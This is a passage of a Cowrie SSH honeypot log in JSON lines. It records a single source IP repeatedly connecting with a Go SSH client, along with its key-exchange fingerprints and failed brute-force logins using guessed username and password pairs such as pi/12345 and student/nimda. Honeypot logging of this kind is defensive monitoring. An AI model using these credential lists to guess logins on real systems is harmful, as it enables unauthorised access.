man-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.187433Z","src_ip":"212.227.125.160","session":"25a098a56666"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.452225Z","src_ip":"212.227.125.160","session":"b3e26bc38f51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37760,"dst_ip":"1.2.3.4","dst_port":22,"session":"da68b5129da2","protocol":"ssh","message":"New connection: 212.227.125.160:37760 (1.2.3.4:22) [session: da68b5129da2]","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.493767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.494713Z","src_ip":"212.227.125.160","session":"da68b5129da2"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.501631Z","src_ip":"212.227.125.160","session":"7ef5d6674c01"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.536608Z","src_ip":"212.227.125.160","session":"da68b5129da2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37764,"dst_ip":"1.2.3.4","dst_port":22,"session":"42e8717af9f7","protocol":"ssh","message":"New connection: 212.227.125.160:37764 (1.2.3.4:22) [session: 42e8717af9f7]","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.542909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.543504Z","src_ip":"212.227.125.160","session":"42e8717af9f7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.585391Z","src_ip":"212.227.125.160","session":"42e8717af9f7"}
{"eventid":"cowrie.login.failed","username":"pi","password":"brigante","message":"login attempt [pi/brigante] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.663861Z","src_ip":"212.227.125.160","session":"da68b5129da2"}
{"eventid":"cowrie.login.failed","username":"student","password":"samar","message":"login attempt [student/samar] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:21.717505Z","src_ip":"212.227.125.160","session":"42e8717af9f7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.734757Z","src_ip":"212.227.125.160","session":"da68b5129da2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.776350Z","src_ip":"212.227.125.160","session":"42e8717af9f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37770,"dst_ip":"1.2.3.4","dst_port":22,"session":"373bb520495d","protocol":"ssh","message":"New connection: 212.227.125.160:37770 (1.2.3.4:22) [session: 373bb520495d]","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.778503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.817622Z","src_ip":"212.227.125.160","session":"373bb520495d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37780,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6cdd1b98990","protocol":"ssh","message":"New connection: 212.227.125.160:37780 (1.2.3.4:22) [session: e6cdd1b98990]","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.829920Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.843315Z","src_ip":"212.227.125.160","session":"373bb520495d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.848806Z","src_ip":"212.227.125.160","session":"e6cdd1b98990"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:22.904671Z","src_ip":"212.227.125.160","session":"e6cdd1b98990"}
{"eventid":"cowrie.login.failed","username":"pi","password":"samar","message":"login attempt [pi/samar] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:23.098647Z","src_ip":"212.227.125.160","session":"373bb520495d"}
{"eventid":"cowrie.login.failed","username":"student","password":"12345","message":"login attempt [student/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:23.159478Z","src_ip":"212.227.125.160","session":"e6cdd1b98990"}
{"eventid":"cowrie.login.failed","username":"www","password":"root123","message":"login attempt [www/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:23.483411Z","src_ip":"212.227.125.160","session":"25a098a56666"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.207809Z","src_ip":"212.227.125.160","session":"373bb520495d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.258019Z","src_ip":"212.227.125.160","session":"e6cdd1b98990"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37794,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7a373006f11","protocol":"ssh","message":"New connection: 212.227.125.160:37794 (1.2.3.4:22) [session: c7a373006f11]","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.273801Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37796,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b7d53b3125b","protocol":"ssh","message":"New connection: 212.227.125.160:37796 (1.2.3.4:22) [session: 7b7d53b3125b]","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.313067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.325135Z","src_ip":"212.227.125.160","session":"c7a373006f11"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.325899Z","src_ip":"212.227.125.160","session":"c7a373006f11"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.359269Z","src_ip":"212.227.125.160","session":"7b7d53b3125b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.360035Z","src_ip":"212.227.125.160","session":"7b7d53b3125b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345","message":"login attempt [pi/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.778367Z","src_ip":"212.227.125.160","session":"c7a373006f11"}
{"eventid":"cowrie.login.failed","username":"student","password":"nimda","message":"login attempt [student/nimda] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.783903Z","src_ip":"212.227.125.160","session":"7b7d53b3125b"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:24.945088Z","src_ip":"212.227.125.160","session":"25a098a56666"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:25.879900Z","src_ip":"212.227.125.160","session":"c7a373006f11"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:25.889699Z","src_ip":"212.227.125.160","session":"7b7d53b3125b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37812,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddbeccf14036","protocol":"ssh","message":"New connection: 212.227.125.160:37812 (1.2.3.4:22) [session: ddbeccf14036]","sensor":"my-vps","timestamp":"2025-08-31T07:07:25.938850Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37816,"dst_ip":"1.2.3.4","dst_port":22,"session":"2410c2456ffc","protocol":"ssh","message":"New connection: 212.227.125.160:37816 (1.2.3.4:22) [session: 2410c2456ffc]","sensor":"my-vps","timestamp":"2025-08-31T07:07:25.942840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.004041Z","src_ip":"212.227.125.160","session":"ddbeccf14036"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.005019Z","src_ip":"212.227.125.160","session":"ddbeccf14036"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.025677Z","src_ip":"212.227.125.160","session":"2410c2456ffc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.026351Z","src_ip":"212.227.125.160","session":"2410c2456ffc"}
{"eventid":"cowrie.login.failed","username":"student","password":"11","message":"login attempt [student/11] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.399713Z","src_ip":"212.227.125.160","session":"2410c2456ffc"}
{"eventid":"cowrie.login.failed","username":"pi","password":"nimda","message":"login attempt [pi/nimda] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:26.428011Z","src_ip":"212.227.125.160","session":"ddbeccf14036"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.442388Z","src_ip":"212.227.125.160","session":"2410c2456ffc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.472005Z","src_ip":"212.227.125.160","session":"ddbeccf14036"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37828,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bba9c87862d","protocol":"ssh","message":"New connection: 212.227.125.160:37828 (1.2.3.4:22) [session: 5bba9c87862d]","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.513811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.517589Z","src_ip":"212.227.125.160","session":"5bba9c87862d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.588209Z","src_ip":"212.227.125.160","session":"5bba9c87862d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"11","message":"login attempt [pi/11] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:27.850984Z","src_ip":"212.227.125.160","session":"5bba9c87862d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:29.439473Z","src_ip":"212.227.125.160","session":"5bba9c87862d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56368,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d79426a1ef","protocol":"ssh","message":"New connection: 212.227.125.160:56368 (1.2.3.4:22) [session: d3d79426a1ef]","sensor":"my-vps","timestamp":"2025-08-31T07:07:29.480809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:29.669769Z","src_ip":"212.227.125.160","session":"d3d79426a1ef"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa